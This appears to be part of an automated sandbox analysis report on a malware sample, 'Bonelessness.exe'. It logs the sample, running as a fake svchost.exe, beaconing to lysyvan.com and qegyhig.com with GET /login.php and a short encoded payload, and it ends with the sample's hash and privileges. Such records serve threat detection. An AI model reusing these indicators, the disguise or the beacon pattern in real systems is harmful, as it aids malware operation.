2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73 Data Ascii: ='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-s
2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 Data Ascii: ht:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2
2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 Data Ascii: 0404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta {line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page
2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 Data Ascii: ngle-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post
2024-08-23 16:47:54 UTC	1369	IN	Data Raw: 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 Data Ascii: focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	64293	188.114.97.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:48:24 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:48:24 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:48:27 UTC	905	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:48:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="81.7",amp_style_sanitizer;dur="46.2",amp_tag_and_attribute_sanitizer;dur="20.1",amp_optimizer;dur="26.5" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=balnk2OvRjmNFcWhCfW3sIe0dyET%2BLYvCnEMC1tn9XQe08uQgblv9beXs6s7gU4IaqoAot%2F04MHquKG%2Bf0cjRHxz0I8PWTBuCcT%2FbvCj%2F2DJu3PPeumy%2BEGbx2S6sQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c970c88ca43b1-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:48:27 UTC	464	IN	Data Raw: 37 63 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c28<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-08-23 16:48:27 UTC	1369	IN	Data Raw: 33 31 34 31 35 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a Data Ascii: 31415000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	64296	188.114.97.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:48:29 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:48:29 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:48:31 UTC	901	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:48:30 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="52.8",amp_style_sanitizer;dur="26.4",amp_tag_and_attribute_sanitizer;dur="19.6",amp_optimizer;dur="27.1" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NfVqjriKKpLNfWAxfKuGGleCENU59WoMf0jwbq8Zs%2BUx7hxro3JyzI0jHO8AsLpCnI7RHtps24XGtsL1%2BRfXBF6ZMqJX0LM%2FkLmmj5P1H7gpGNhn%2BP0jX0oc7JEvQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c9727ae7a0f74-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:48:31 UTC	468	IN	Data Raw: 37 63 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c2c<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-08-23 16:48:31 UTC	1369	IN	Data Raw: 35 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 Data Ascii: 5000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-tex

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	56397	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:49:01 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:49:01 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:49:02 UTC	761	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:49:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WOxX7ZabhGJtfHcIlKhKSvMyDxoHTvb5m8dF9kdoeh%2B%2FLcF8uGcdWD2q19o7JMHbyobMrjO%2BExr91qzbJpD3jEOXwle4sVyhIRHmx7MSjw%2Bfoi7hVrSc6BxHtOzYNA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c97f05e457c82-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:49:02 UTC	608	IN	Data Raw: 37 63 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb7<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:49:02 UTC	1369	IN	Data Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe
2024-08-23 16:49:02 UTC	1369	IN	Data Raw: 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 Data Ascii: .fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(f
2024-08-23 16:49:02 UTC	1369	IN	Data Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	56400	188.114.96.3	443	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:49:03 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:49:03 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:49:04 UTC	761	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:49:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WwGf3JCF6iWzNbjzMuuGFqoGw6V69VsQY4tEAyAbklo2p8mFQh9HH%2B4%2FPCT9uqqICWfsuoH9p%2FWwj3hm94Wuz29LgWXS9kHwMGSlvDsQcY1JgK1mXAjqW9hrnl%2Bmhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c97fe8f874349-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:49:04 UTC	608	IN	Data Raw: 37 63 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:49:04 UTC	1369	IN	Data Raw: 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 Data Ascii: </title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qe

Target ID:	0
Start time:	12:46:57
Start date:	23/08/2024
Path:	C:\Users\user\Desktop\Bonelessness.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bonelessness.exe"
Imagebase:	0x400000
File size:	213'504 bytes
MD5 hash:	475FEAF47584EA0673437174181F5019
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
